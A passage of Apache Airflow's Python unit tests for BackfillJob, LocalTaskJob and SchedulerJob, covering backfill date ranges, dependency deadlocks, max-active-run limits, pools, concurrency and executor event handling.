scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = mock.Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id=='example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
"""
# some DAGs really are just examples... but try to make them work!
skip_dags = [
'example_http_operator',
'example_twitter_dag',
'example_trigger_target_dag',
'example_trigger_controller_dag', # tested above
'test_utils', # sleeps forever
]
logger = logging.getLogger('BackfillJobTest.test_backfill_examples')
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id not in skip_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
        # check the order is right. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
Test for https://github.com/airbnb/airflow/pull/1225
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
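# without -I (ignore first depends_on_past) the backfill deadlocks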
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
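# an hourly schedule over a one-hour window yields two dag runs, well under
# the max_active_runs limit of 16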
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different from the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
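# run the backfill in a separate thread so this test can create and modify
# dag runs while the backfill is waiting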
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# With max_active_runs set to 1, the backfill has to work through the
# dag runs one at a time; both runs in the range should end up successful.
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
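# the sub dag contains only the two 'leave' tasks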
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
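# put the existing task instances into a mix of states; op6 is left untouched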
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 is intentionally left with no state (None)
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
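# _update_counters should move each ti out of 'started' and into the
# bucket that matches its state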
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for reschedule (a ti reset to State.NONE should go back into to_run)
ti.set_state(State.NONE, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
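# the hostname recorded on the ti does not match this machine, so the
# heartbeat callback should raise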
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = socket.getfqdn()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
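# wait up to ~5 seconds for the task to reach the RUNNING state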
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = socket.getfqdn()
ti.pid = 1
session.commit()
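# a second LocalTaskJob for the already-running ti must not start the task runner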
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
# These defaults make the test faster to run
default_scheduler_args = {"file_process_interval": 0,
"processor_poll_interval": 0.5}
def setUp(self):
self.dagbag = DagBag()
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type dags_folder: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
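# simulate the executor reporting a FAILED result for ti1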
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
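# mark the dag run as a backfill run via its run_id prefix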
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
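# one ti without any dag run, one belonging to the backfill run,
# one with a regular dag run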
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
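# two dag runs x two pooled tasks = four scheduled task instances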
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
